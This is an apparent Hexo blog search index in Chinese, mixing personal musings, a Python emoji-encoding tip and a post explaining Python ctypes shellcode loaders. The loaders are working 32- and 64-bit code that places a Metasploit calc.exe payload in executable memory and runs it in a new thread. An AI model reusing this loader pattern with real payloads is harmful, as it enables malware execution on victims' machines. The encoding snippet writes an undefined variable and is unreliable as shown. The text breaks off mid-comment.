-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathsearch.xml
133 lines (63 loc) · 34.3 KB
/
search.xml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
<?xml version="1.0" encoding="utf-8"?>
<search>
<entry>
<title>审视</title>
<link href="/2022/04/11/%E5%AE%A1%E8%A7%86/"/>
<url>/2022/04/11/%E5%AE%A1%E8%A7%86/</url>
<content type="html"><![CDATA[<p>//本以着记录技术文章创建的博客 却伴随着许多随谈 牢骚。无法清理的痕迹就进行格式化后的出厂设置 重新开始。abandon还是abandon 不会改变 –END</p>]]></content>
</entry>
<entry>
<title>abandon的诞生</title>
<link href="/2022/03/26/abandon%E7%9A%84%E8%AF%9E%E7%94%9F/"/>
<url>/2022/03/26/abandon%E7%9A%84%E8%AF%9E%E7%94%9F/</url>
<content type="html"><![CDATA[<p>2022/03/26</p><p>:你英文好吗</p><p>哈哈哈哈<br>英语太难了</p><p>:有没有符合”情理之中 意料之外” 的词</p><p>abandon</p><p>是不是意料之外<br>细想又符合情理之中</p><p>:厉害,就叫这个了</p><p>认真的吗?</p><p>:认真的</p><p>我不知所措</p><p>:我认为abandon比符合“情理之中 意料之外”的词还有意思</p><p>我脑子里只有这个词了</p><p>:这不就是意料之外了吗,多符合.</p><hr><p>abandon0326 就此诞生</p>]]></content>
<categories>
<category> 日常记录 </category>
</categories>
</entry>
<entry>
<title>随谈</title>
<link href="/2022/03/26/%E9%9A%8F%E8%B0%88/"/>
<url>/2022/03/26/%E9%9A%8F%E8%B0%88/</url>
<content type="html"><![CDATA[<p>一段时间已过,可见的文章少的有些可怜,不是没有一些新的发现与一些想法 而是没有当初心血来潮的那份热情与安稳的心境。</p><p>似乎焦躁不安的心境来源于自我认为的自律,但我知道 那还不够(我在吹牛)。现在社交平台的分享感觉没有了那股味道,可能来源于年龄的增长 经历的增加 亦或者环境 而感到不适,博客上记录所见 所想 所得 应该是一个更好的地方,不求有人看见交流 但求那一刻的想法记录 与 “缘” 的奇妙。</p><p>每当过去一段时间 都会为过去 最基本的 “说” 与 “做” 而感到遗憾,处理的不够完美,大多数都处于 少了提前的想法 与 情绪的牵引。更加深刻的认为情绪比大脑的引导 多的比认为的还多。可能成熟 就是意味着 理性 压制住 情绪。但人之所以为人 事之所以有那么多变化 可能也是因为着”情”这一字。</p><p>每段时间的自省会对自己有许多想法 可想法往往只存在一刻,做到的人似乎不多,知行合一 是现在对于自己的一个要求吧(我觉得无法做到)。人们都说 多想 想好了再去做 不是没理,但那时 想法与所做快要达成共识时,更多的想法可能会压制住做法 过后的是 自我认为的天真。 可见 什么事物 都存在两面性,好的有坏的一面 坏的有好的一面,坏处可能不是自我所想的坏处 好处可能不是自我所想的好处。阴阳一说 大理所在。回想起 一些电影 视频 电视剧 中的事物 觉得那么的可笑不及 却在你经历后 会发现 描述的还算是浅了一点。看电影的时候 会以着 每时每刻都存在它的意义 而去看 也不会出现毛躁 不耐烦的心态了。事物 所发生后 才是事实,没发生之前的自我想法有必要 也没有必要 取舍在自己。</p><p>这个年龄段的成熟一词 我还是认为 极致的理性 压制住 本来的情绪。不要肯定自己的想法就是事物所产生的那样,”这里” 存在太多太多的随机性。</p><p>情理之中 意料之外 ~~~~~~~~~。</p>]]></content>
<categories>
<category> 日常记录 </category>
</categories>
</entry>
<entry>
<title>python3 表情字符写入文本</title>
<link href="/2021/12/07/python3-%E8%A1%A8%E6%83%85%E5%AD%97%E7%AC%A6%E5%86%99%E5%85%A5%E6%96%87%E6%9C%AC/"/>
<url>/2021/12/07/python3-%E8%A1%A8%E6%83%85%E5%AD%97%E7%AC%A6%E5%86%99%E5%85%A5%E6%96%87%E6%9C%AC/</url>
<content type="html"><![CDATA[<h3 id="python3爬虫遇到emoji-表情字符-或特殊字符时-无法将字符写入到文本文件。"><a href="#python3爬虫遇到emoji-表情字符-或特殊字符时-无法将字符写入到文本文件。" class="headerlink" title="python3爬虫遇到emoji 表情字符 或特殊字符时 无法将字符写入到文本文件。"></a>python3爬虫遇到emoji 表情字符 或特殊字符时 无法将字符写入到文本文件。</h3><p>python2</p><figure class="highlight apache"><table><tr><td class="gutter"><div class="code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></div></td><td class="code"><pre><code class="hljs apache"><span class="hljs-attribute">dc</span>='%uD<span class="hljs-number">83</span>C%uDF<span class="hljs-number">52</span>%uD<span class="hljs-number">83</span>C%uDF<span class="hljs-number">52</span>%<span class="hljs-number">20</span>%u<span class="hljs-number">5</span>C<span class="hljs-number">0</span>F%u<span class="hljs-number">6</span>A<span class="hljs-number">31</span>%u<span class="hljs-number">5</span>B<span class="hljs-number">50</span>' <br><span class="hljs-comment">#爬取到的unicode格式字符串 原型(🍒🍒小樱子)</span><br><br><span class="hljs-attribute">dc</span>=dc.replace(<span class="hljs-string">"%"</span>,<span class="hljs-string">"\\"</span>)#转换格式<br><span class="hljs-attribute">dc</span>=dc.decode(<span class="hljs-string">"unicode_escape"</span>)#unicode_escape 编码适合作为 ASCII 编码的 Python 源代码中的 Unicode 文字的内容,但引号不会被转义。从 Latin-<span class="hljs-number">1</span> 源代码解码。<br><br><span class="hljs-attribute">dc</span>=dc.encode(<span class="hljs-string">"utf-8"</span>)<br><span class="hljs-attribute">with</span> open(<span class="hljs-string">"1.txt"</span>,'a+') as f:<br><span class="hljs-attribute">f</span>.write(dc)<br></code></pre></td></tr></table></figure><hr><p>同样的代码 因为python2 与 python3 的一些特性 导致python3下写入文本出错。</p><p>原理很简单,特性有点烦人。</p><hr><p>python3</p><figure class="highlight stylus"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs stylus">tmp=<span class="hljs-string">'%uD83C%uDF52%uD83C%uDF52%20%u5C0F%u6A31%u5B50'</span><br><br>tmp=tmp<span class="hljs-selector-class">.replace</span>(<span class="hljs-string">"%"</span>,<span class="hljs-string">"\\"</span>)<br>tmp=tmp<span class="hljs-selector-class">.encode</span>(<span class="hljs-string">"latin_1"</span>)<span class="hljs-selector-class">.decode</span>(<span class="hljs-string">"raw_unicode_escape"</span>)<span class="hljs-selector-class">.encode</span>(<span class="hljs-string">'utf-16'</span>,<span class="hljs-string">'surrogatepass'</span>)<span class="hljs-selector-class">.decode</span>(<span class="hljs-string">'utf-16'</span>,<span class="hljs-string">'surrogatepass'</span>)<span class="hljs-selector-class">.encode</span>(<span class="hljs-string">"raw_unicode_escape"</span>)<span class="hljs-selector-class">.decode</span>(<span class="hljs-string">"unicode_escape"</span>)<br><br>with open(<span class="hljs-string">"1.txt"</span>,<span class="hljs-string">'a+'</span>,encoding=<span class="hljs-string">"utf-16"</span>) as f:<br>f<span class="hljs-selector-class">.write</span>(a)<br></code></pre></td></tr></table></figure><p>写入文件的编码转换重点不在于编码上的转换,写入文件打开的默认编码格式也要注意。</p>]]></content>
<categories>
<category> 编程 </category>
</categories>
<tags>
<tag> python </tag>
</tags>
</entry>
<entry>
<title>python shellcode loader</title>
<link href="/2021/11/06/python-shellcode-loader/"/>
<url>/2021/11/06/python-shellcode-loader/</url>
<content type="html"><![CDATA[<p>#python shellcode loader </p><p>示列代码 32位环境:</p><figure class="highlight python"><table><tr><td class="gutter"><div class="code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br></pre></div></td><td class="code"><pre><code class="hljs python"><br><span class="hljs-comment">#python 3.7.0 32bit </span><br><span class="hljs-comment">#!/usr/bin/python</span><br><span class="hljs-comment"># Metasploit windows/x86/exec calc.exe 32位payload</span><br><br><span class="hljs-keyword">import</span> ctypes<span class="hljs-comment">#加载dll,C数据类型。</span><br><br>buf = <span class="hljs-string">b""</span><br>buf += <span class="hljs-string">b"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30"</span><br>buf += <span class="hljs-string">b"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"</span><br>buf += <span class="hljs-string">b"\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52"</span><br>buf += <span class="hljs-string">b"\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1"</span><br>buf += <span class="hljs-string">b"\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b"</span><br>buf += <span class="hljs-string">b"\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03"</span><br>buf += <span class="hljs-string">b"\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b"</span><br>buf += <span class="hljs-string">b"\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24"</span><br>buf += <span class="hljs-string">b"\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb"</span><br>buf += <span class="hljs-string">b"\x8d\x5d\x6a\x01\x8d\x85\xb2\x00\x00\x00\x50\x68\x31\x8b\x6f"</span><br>buf += <span class="hljs-string">b"\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5"</span><br>buf += <span class="hljs-string">b"\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a"</span><br>buf += <span class="hljs-string">b"\x00\x53\xff\xd5\x63\x61\x6c\x63\x2e\x65\x78\x65\x00"</span><br><br><br><span class="hljs-comment">#将字节类型payload 转换为字节数组bytearray, </span><br>shellcode=<span class="hljs-built_in">bytearray</span>(buf)<br><br><br><span class="hljs-comment">#调用VirtualAlloc函数,来申请一块动态内存区域。 </span><br>ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(<span class="hljs-number">0</span>), <span class="hljs-comment">#要分配的内存区域的地址0或None为线程指向,也可指向一个未占用的内存地址</span><br> ctypes.c_int(<span class="hljs-built_in">len</span>(shellcode)),<span class="hljs-comment">#分配的大小</span><br> ctypes.c_int(<span class="hljs-number">0x3000</span>),<span class="hljs-comment">#分配的类型 为原型0x1000 0x2000的合并 </span><br> ctypes.c_int(<span class="hljs-number">0x40</span>))<span class="hljs-comment">#该内存的初始保护属性 可读可写可执行</span><br><span class="hljs-comment">#将shellcode 放进申请内存空间 </span><br>buf = (ctypes.c_char * <span class="hljs-built_in">len</span>(shellcode)).from_buffer(shellcode)<br><br>ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr),<span class="hljs-comment">#指向移动目的地址的指针。</span><br> buf,<span class="hljs-comment">#指向要复制的内存地址的指针。</span><br> ctypes.c_int(<span class="hljs-built_in">len</span>(shellcode)))<span class="hljs-comment">#指定要复制的字节数。</span><br> <br> <br><span class="hljs-comment">#调用CreateThread将在主线程的基础上创建一个新线程,创建一个线程从shellcode放置位置开始执行</span><br>ht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(<span class="hljs-number">0</span>),<span class="hljs-comment">#线程安全属性</span><br> ctypes.c_int(<span class="hljs-number">0</span>),<span class="hljs-comment">#置初始栈的大小,以字节为单位</span><br> ctypes.c_int(ptr),<span class="hljs-comment">#指向线程函数的指针</span><br> ctypes.c_int(<span class="hljs-number">0</span>),<span class="hljs-comment">#向线程函数传递的参数</span><br> ctypes.c_int(<span class="hljs-number">0</span>),<span class="hljs-comment">#线程创建属性</span><br> ctypes.pointer(ctypes.c_int(<span class="hljs-number">0</span>)))<span class="hljs-comment">#保存新线程的id</span><br><br><span class="hljs-comment">#等待创建的线程运行结束 一个是创建的线程,一个是等待时间 时间=-1 无限等待</span><br><br>ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht),ctypes.c_int(-<span class="hljs-number">1</span>))<br><br></code></pre></td></tr></table></figure><p>参考来自:<br>XG小刚 <a href="https://mp.weixin.qq.com/s/-WcEW1aznO2IuCezkCe9HQ">https://mp.weixin.qq.com/s/-WcEW1aznO2IuCezkCe9HQ</a><br><a href="https://www.cnblogs.com/Akkuman/p/11851057.html">https://www.cnblogs.com/Akkuman/p/11851057.html</a><br>感谢两位帅哥</p><p>简单来说 shellcode是一段可执行的十六进制代码, 加载器就是申请一片可读可写可执行的内存空间,将shellcode 放进一个内存空间,从shellcode的头部开始执行。实现将shellcode 执行的原理。大部分语言的加载器都是基于C 的 “ffi”(Foreign function interface 外部函数接口). 原理都是一样的。以自己目前的认知来看所这样的。 </p><hr><p>主要的代码:<br>以下代码 某句语句 也可用其他方式执行shellcode。</p><figure class="highlight stylus"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><code class="hljs stylus">kernel32<span class="hljs-selector-class">.dll</span> 的VirtualAlloc 函数,申请一块可读可写可执行的空间.<br>ctypes<span class="hljs-selector-class">.windll</span><span class="hljs-selector-class">.kernel32</span><span class="hljs-selector-class">.VirtualAlloc</span> <br><br>kernel32<span class="hljs-selector-class">.dll</span> 的RtlMoveMemory 将shellcode 放进申请好的空间<br>ctypes<span class="hljs-selector-class">.windll</span><span class="hljs-selector-class">.kernel32</span><span class="hljs-selector-class">.RtlMoveMemory</span><br><br>kernel32<span class="hljs-selector-class">.dll</span> 的CreateThread 创建一个新的线程,执行指向内存空间的代码<br>ctypes<span class="hljs-selector-class">.windll</span><span class="hljs-selector-class">.kernel32</span><span class="hljs-selector-class">.CreateThread</span><br><br>等待创建线程结束<br>ctypes<span class="hljs-selector-class">.windll</span><span class="hljs-selector-class">.kernel32</span><span class="hljs-selector-class">.WaitForSingleObject</span><br><br></code></pre></td></tr></table></figure><hr><p>shellcode的类型转换 也可采用ctypes.c_char_p(buf) 的类型 替代 RtlMoveMemory 指向要复制的内存地址的指针。 或者shellcode不转换类型也可以成功加载,这一点有点不理解。 RtlMoveMemory 的参数应该是要复制过去的内存的指针地址, 可未编码的shellcode只是一串字节类型十六进制的code。 并没有明确指向地址,看RtlMoveMemory的原型也没看到这一点,除非这一段声明的变量放入的过程中 是会把地址默认加载过去。这样的话 下面的类型转换是否有点多余。 </p><figure class="highlight ini"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs ini"><span class="hljs-attr">shellcode</span>=bytearray(buf)<br><span class="hljs-attr">buf</span> = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)<br></code></pre></td></tr></table></figure><hr><p>示列代码需要在32位python3环境 和32位payload 下运行,否则会出现写入访问从突的错误,该错误 由于VirtualAlloc的默认返回类型不与64为兼容引发的错误<br>设置VirtualAlloc返回类型为ctypes.c_uint64<br>ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64</p><hr><p>以下是64位环境的示列代码,唯一与上面不同的就是payload不同,数据类型不一样(ctypes.c_uint64):</p><figure class="highlight taggerscript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br></pre></td><td class="code"><pre><code class="hljs taggerscript">import ctypes<br><br>shellcode = b""<br>shellcode += b"<span class="hljs-symbol">\x</span>fc<span class="hljs-symbol">\x</span>48<span class="hljs-symbol">\x</span>83<span class="hljs-symbol">\x</span>e4<span class="hljs-symbol">\x</span>f0<span class="hljs-symbol">\x</span>e8<span class="hljs-symbol">\x</span>c0<span class="hljs-symbol">\x</span>00<span class="hljs-symbol">\x</span>00<span class="hljs-symbol">\x</span>00<span class="hljs-symbol">\x</span>41<span class="hljs-symbol">\x</span>51<span class="hljs-symbol">\x</span>41"<br>shellcode += b"<span class="hljs-symbol">\x</span>50<span class="hljs-symbol">\x</span>52<span class="hljs-symbol">\x</span>51<span class="hljs-symbol">\x</span>56<span class="hljs-symbol">\x</span>48<span class="hljs-symbol">\x</span>31<span class="hljs-symbol">\x</span>d2<span class="hljs-symbol">\x</span>65<span class="hljs-symbol">\x</span>48<span class="hljs-symbol">\x</span>8b<span class="hljs-symbol">\x</span>52<span class="hljs-symbol">\x</span>60<span class="hljs-symbol">\x</span>48"<br>shellcode += b"<span class="hljs-symbol">\x</span>8b<span class="hljs-symbol">\x</span>52<span class="hljs-symbol">\x</span>18<span class="hljs-symbol">\x</span>48<span class="hljs-symbol">\x</span>8b<span class="hljs-symbol">\x</span>52<span class="hljs-symbol">\x</span>20<span class="hljs-symbol">\x</span>48<span class="hljs-symbol">\x</span>8b<span class="hljs-symbol">\x</span>72<span class="hljs-symbol">\x</span>50<span class="hljs-symbol">\x</span>48<span class="hljs-symbol">\x</span>0f"<br>shellcode += b"<span class="hljs-symbol">\x</span>b7<span class="hljs-symbol">\x</span>4a<span class="hljs-symbol">\x</span>4a<span class="hljs-symbol">\x</span>4d<span class="hljs-symbol">\x</span>31<span class="hljs-symbol">\x</span>c9<span class="hljs-symbol">\x</span>48<span class="hljs-symbol">\x</span>31<span class="hljs-symbol">\x</span>c0<span class="hljs-symbol">\x</span>ac<span class="hljs-symbol">\x</span>3c<span class="hljs-symbol">\x</span>61<span class="hljs-symbol">\x</span>7c"<br>shellcode += b"<span class="hljs-symbol">\x</span>02<span class="hljs-symbol">\x</span>2c<span class="hljs-symbol">\x</span>20<span class="hljs-symbol">\x</span>41<span class="hljs-symbol">\x</span>c1<span class="hljs-symbol">\x</span>c9<span class="hljs-symbol">\x</span>0d<span class="hljs-symbol">\x</span>41<span class="hljs-symbol">\x</span>01<span class="hljs-symbol">\x</span>c1<span class="hljs-symbol">\x</span>e2<span class="hljs-symbol">\x</span>ed<span class="hljs-symbol">\x</span>52"<br>shellcode += b"<span class="hljs-symbol">\x</span>41<span class="hljs-symbol">\x</span>51<span class="hljs-symbol">\x</span>48<span class="hljs-symbol">\x</span>8b<span class="hljs-symbol">\x</span>52<span class="hljs-symbol">\x</span>20<span class="hljs-symbol">\x</span>8b<span class="hljs-symbol">\x</span>42<span class="hljs-symbol">\x</span>3c<span class="hljs-symbol">\x</span>48<span class="hljs-symbol">\x</span>01<span class="hljs-symbol">\x</span>d0<span class="hljs-symbol">\x</span>8b"<br>shellcode += b"<span class="hljs-symbol">\x</span>80<span class="hljs-symbol">\x</span>88<span class="hljs-symbol">\x</span>00<span class="hljs-symbol">\x</span>00<span class="hljs-symbol">\x</span>00<span class="hljs-symbol">\x</span>48<span class="hljs-symbol">\x</span>85<span class="hljs-symbol">\x</span>c0<span class="hljs-symbol">\x</span>74<span class="hljs-symbol">\x</span>67<span class="hljs-symbol">\x</span>48<span class="hljs-symbol">\x</span>01<span class="hljs-symbol">\x</span>d0"<br>shellcode += b"<span class="hljs-symbol">\x</span>50<span class="hljs-symbol">\x</span>8b<span class="hljs-symbol">\x</span>48<span class="hljs-symbol">\x</span>18<span class="hljs-symbol">\x</span>44<span class="hljs-symbol">\x</span>8b<span class="hljs-symbol">\x</span>40<span class="hljs-symbol">\x</span>20<span class="hljs-symbol">\x</span>49<span class="hljs-symbol">\x</span>01<span class="hljs-symbol">\x</span>d0<span class="hljs-symbol">\x</span>e3<span class="hljs-symbol">\x</span>56"<br>shellcode += b"<span class="hljs-symbol">\x</span>48<span class="hljs-symbol">\x</span>ff<span class="hljs-symbol">\x</span>c9<span class="hljs-symbol">\x</span>41<span class="hljs-symbol">\x</span>8b<span class="hljs-symbol">\x</span>34<span class="hljs-symbol">\x</span>88<span class="hljs-symbol">\x</span>48<span class="hljs-symbol">\x</span>01<span class="hljs-symbol">\x</span>d6<span class="hljs-symbol">\x</span>4d<span class="hljs-symbol">\x</span>31<span class="hljs-symbol">\x</span>c9"<br>shellcode += b"<span class="hljs-symbol">\x</span>48<span class="hljs-symbol">\x</span>31<span class="hljs-symbol">\x</span>c0<span class="hljs-symbol">\x</span>ac<span class="hljs-symbol">\x</span>41<span class="hljs-symbol">\x</span>c1<span class="hljs-symbol">\x</span>c9<span class="hljs-symbol">\x</span>0d<span class="hljs-symbol">\x</span>41<span class="hljs-symbol">\x</span>01<span class="hljs-symbol">\x</span>c1<span class="hljs-symbol">\x</span>38<span class="hljs-symbol">\x</span>e0"<br>shellcode += b"<span class="hljs-symbol">\x</span>75<span class="hljs-symbol">\x</span>f1<span class="hljs-symbol">\x</span>4c<span class="hljs-symbol">\x</span>03<span class="hljs-symbol">\x</span>4c<span class="hljs-symbol">\x</span>24<span class="hljs-symbol">\x</span>08<span class="hljs-symbol">\x</span>45<span class="hljs-symbol">\x</span>39<span class="hljs-symbol">\x</span>d1<span class="hljs-symbol">\x</span>75<span class="hljs-symbol">\x</span>d8<span class="hljs-symbol">\x</span>58"<br>shellcode += b"<span class="hljs-symbol">\x</span>44<span class="hljs-symbol">\x</span>8b<span class="hljs-symbol">\x</span>40<span class="hljs-symbol">\x</span>24<span class="hljs-symbol">\x</span>49<span class="hljs-symbol">\x</span>01<span class="hljs-symbol">\x</span>d0<span class="hljs-symbol">\x</span>66<span class="hljs-symbol">\x</span>41<span class="hljs-symbol">\x</span>8b<span class="hljs-symbol">\x</span>0c<span class="hljs-symbol">\x</span>48<span class="hljs-symbol">\x</span>44"<br>shellcode += b"<span class="hljs-symbol">\x</span>8b<span class="hljs-symbol">\x</span>40<span class="hljs-symbol">\x</span>1c<span class="hljs-symbol">\x</span>49<span class="hljs-symbol">\x</span>01<span class="hljs-symbol">\x</span>d0<span class="hljs-symbol">\x</span>41<span class="hljs-symbol">\x</span>8b<span class="hljs-symbol">\x</span>04<span class="hljs-symbol">\x</span>88<span class="hljs-symbol">\x</span>48<span class="hljs-symbol">\x</span>01<span class="hljs-symbol">\x</span>d0"<br>shellcode += b"<span class="hljs-symbol">\x</span>41<span class="hljs-symbol">\x</span>58<span class="hljs-symbol">\x</span>41<span class="hljs-symbol">\x</span>58<span class="hljs-symbol">\x</span>5e<span class="hljs-symbol">\x</span>59<span class="hljs-symbol">\x</span>5a<span class="hljs-symbol">\x</span>41<span class="hljs-symbol">\x</span>58<span class="hljs-symbol">\x</span>41<span class="hljs-symbol">\x</span>59<span class="hljs-symbol">\x</span>41<span class="hljs-symbol">\x</span>5a"<br>shellcode += b"<span class="hljs-symbol">\x</span>48<span class="hljs-symbol">\x</span>83<span class="hljs-symbol">\x</span>ec<span class="hljs-symbol">\x</span>20<span class="hljs-symbol">\x</span>41<span class="hljs-symbol">\x</span>52<span class="hljs-symbol">\x</span>ff<span class="hljs-symbol">\x</span>e0<span class="hljs-symbol">\x</span>58<span class="hljs-symbol">\x</span>41<span class="hljs-symbol">\x</span>59<span class="hljs-symbol">\x</span>5a<span class="hljs-symbol">\x</span>48"<br>shellcode += b"<span class="hljs-symbol">\x</span>8b<span class="hljs-symbol">\x</span>12<span class="hljs-symbol">\x</span>e9<span class="hljs-symbol">\x</span>57<span class="hljs-symbol">\x</span>ff<span class="hljs-symbol">\x</span>ff<span class="hljs-symbol">\x</span>ff<span class="hljs-symbol">\x</span>5d<span class="hljs-symbol">\x</span>48<span class="hljs-symbol">\x</span>ba<span class="hljs-symbol">\x</span>01<span class="hljs-symbol">\x</span>00<span class="hljs-symbol">\x</span>00"<br>shellcode += b"<span class="hljs-symbol">\x</span>00<span class="hljs-symbol">\x</span>00<span class="hljs-symbol">\x</span>00<span class="hljs-symbol">\x</span>00<span class="hljs-symbol">\x</span>00<span class="hljs-symbol">\x</span>48<span class="hljs-symbol">\x</span>8d<span class="hljs-symbol">\x</span>8d<span class="hljs-symbol">\x</span>01<span class="hljs-symbol">\x</span>01<span class="hljs-symbol">\x</span>00<span class="hljs-symbol">\x</span>00<span class="hljs-symbol">\x</span>41"<br>shellcode += b"<span class="hljs-symbol">\x</span>ba<span class="hljs-symbol">\x</span>31<span class="hljs-symbol">\x</span>8b<span class="hljs-symbol">\x</span>6f<span class="hljs-symbol">\x</span>87<span class="hljs-symbol">\x</span>ff<span class="hljs-symbol">\x</span>d5<span class="hljs-symbol">\x</span>bb<span class="hljs-symbol">\x</span>f0<span class="hljs-symbol">\x</span>b5<span class="hljs-symbol">\x</span>a2<span class="hljs-symbol">\x</span>56<span class="hljs-symbol">\x</span>41"<br>shellcode += b"<span class="hljs-symbol">\x</span>ba<span class="hljs-symbol">\x</span>a6<span class="hljs-symbol">\x</span>95<span class="hljs-symbol">\x</span>bd<span class="hljs-symbol">\x</span>9d<span class="hljs-symbol">\x</span>ff<span class="hljs-symbol">\x</span>d5<span class="hljs-symbol">\x</span>48<span class="hljs-symbol">\x</span>83<span class="hljs-symbol">\x</span>c4<span class="hljs-symbol">\x</span>28<span class="hljs-symbol">\x</span>3c<span class="hljs-symbol">\x</span>06"<br>shellcode += b"<span class="hljs-symbol">\x</span>7c<span class="hljs-symbol">\x</span>0a<span class="hljs-symbol">\x</span>80<span class="hljs-symbol">\x</span>fb<span class="hljs-symbol">\x</span>e0<span class="hljs-symbol">\x</span>75<span class="hljs-symbol">\x</span>05<span class="hljs-symbol">\x</span>bb<span class="hljs-symbol">\x</span>47<span class="hljs-symbol">\x</span>13<span class="hljs-symbol">\x</span>72<span class="hljs-symbol">\x</span>6f<span class="hljs-symbol">\x</span>6a"<br>shellcode += b"<span class="hljs-symbol">\x</span>00<span class="hljs-symbol">\x</span>59<span class="hljs-symbol">\x</span>41<span class="hljs-symbol">\x</span>89<span class="hljs-symbol">\x</span>da<span class="hljs-symbol">\x</span>ff<span class="hljs-symbol">\x</span>d5<span class="hljs-symbol">\x</span>63<span class="hljs-symbol">\x</span>61<span class="hljs-symbol">\x</span>6c<span class="hljs-symbol">\x</span>63<span class="hljs-symbol">\x</span>2e<span class="hljs-symbol">\x</span>65"<br>shellcode += b"<span class="hljs-symbol">\x</span>78<span class="hljs-symbol">\x</span>65<span class="hljs-symbol">\x</span>00"<br><br>shellcode = bytearray(shellcode)<br># 设置VirtualAlloc返回类型为ctypes.c_uint64<br>ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64<br># 申请内存<br>ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(shellcode)), ctypes.c_int(0x3000), ctypes.c_int(0x40))<br> <br># 放入shellcode<br>buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)<br>ctypes.windll.kernel32.RtlMoveMemory(<br> ctypes.c_uint64(ptr), <br> buf, <br> ctypes.c_int(len(shellcode))<br>)<br># 创建一个线程从shellcode放置位置首地址开始执行<br>handle = ctypes.windll.kernel32.CreateThread(<br> ctypes.c_int(0), <br> ctypes.c_int(0), <br> ctypes.c_uint64(ptr), <br> ctypes.c_int(0), <br> ctypes.c_int(0), <br> ctypes.pointer(ctypes.c_int(0))<br>)<br># 